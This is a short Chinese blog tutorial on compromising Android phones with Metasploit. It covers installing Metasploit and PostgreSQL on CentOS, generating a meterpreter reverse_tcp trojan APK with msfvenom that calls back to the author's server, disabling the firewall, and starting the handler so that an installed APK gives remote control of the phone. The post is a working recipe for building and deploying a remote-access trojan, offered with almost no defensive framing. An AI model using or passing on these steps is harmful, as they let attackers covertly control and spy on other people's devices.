msf的android入侵简单过程
首页 > 学习    作者:Iamyc   2018年7月10日 23:33 星期二   热度:432°   百度已收录  
时间:2018-7-10 23:33   热度:432° 

centos安装msf:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

安装postgre

yum install postgresql
yum install postgresql-server

安装完成后先别启动服务,这里有个 关键的步骤 就是修改验证方式,编辑/var/lib/pgsql/data/pg_hba.conf文件,添加一行

host    "msf_database"	"msf_user"      127.0.0.1/32          md5
host     all             all            127.0.0.1/32          ident

保存后初始化数据库并启动服务,这里我直接就是root权限:

postgresql-setup initdb
systemctl start postgresql.service
su postgres
createuser msf_user -P
Enter password for new role: yourmsfpassword
Enter it again: yourmsfpassword
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
createdb --owner=msf_user msf_database

1、各种方式,先连接服务器(可以做内网测试,我使用的直接是公网)


2、制作android的木马apk

msfvenom -p android/meterpreter/reverse_tcp lhost=110.110.*.*(你当前装了msf的ip) lport=4444(其他端口也行) R > /root/4444.apk

如果抱错,比如什么什么too large,表示数据类型太大了,可以直接vim那个rb文件,修改抱错的那一行,大数改成小一点的即可


3、打开msf控制台


4、设置payload和exploit


5、设置本地ip,注意,如果是公网,此处的lhost也是公网的内网ip


6、在exploit之前,记得检查服务器的防火墙状态哈,比如我的centos,关闭firewall可以这样语句

systemctl stop firewalld

然后可以exploit了


7、然后你可以测试安装apk,点击,然后服务器就可以上线


8、然后可以对android系统输入一些控制命令,所有的命令你可以在meterpreter输入help即可察看


好了,测试到此为止。。。。











二维码加载中...
本文作者:Iamyc      文章标题: msf的android入侵简单过程
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=5
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog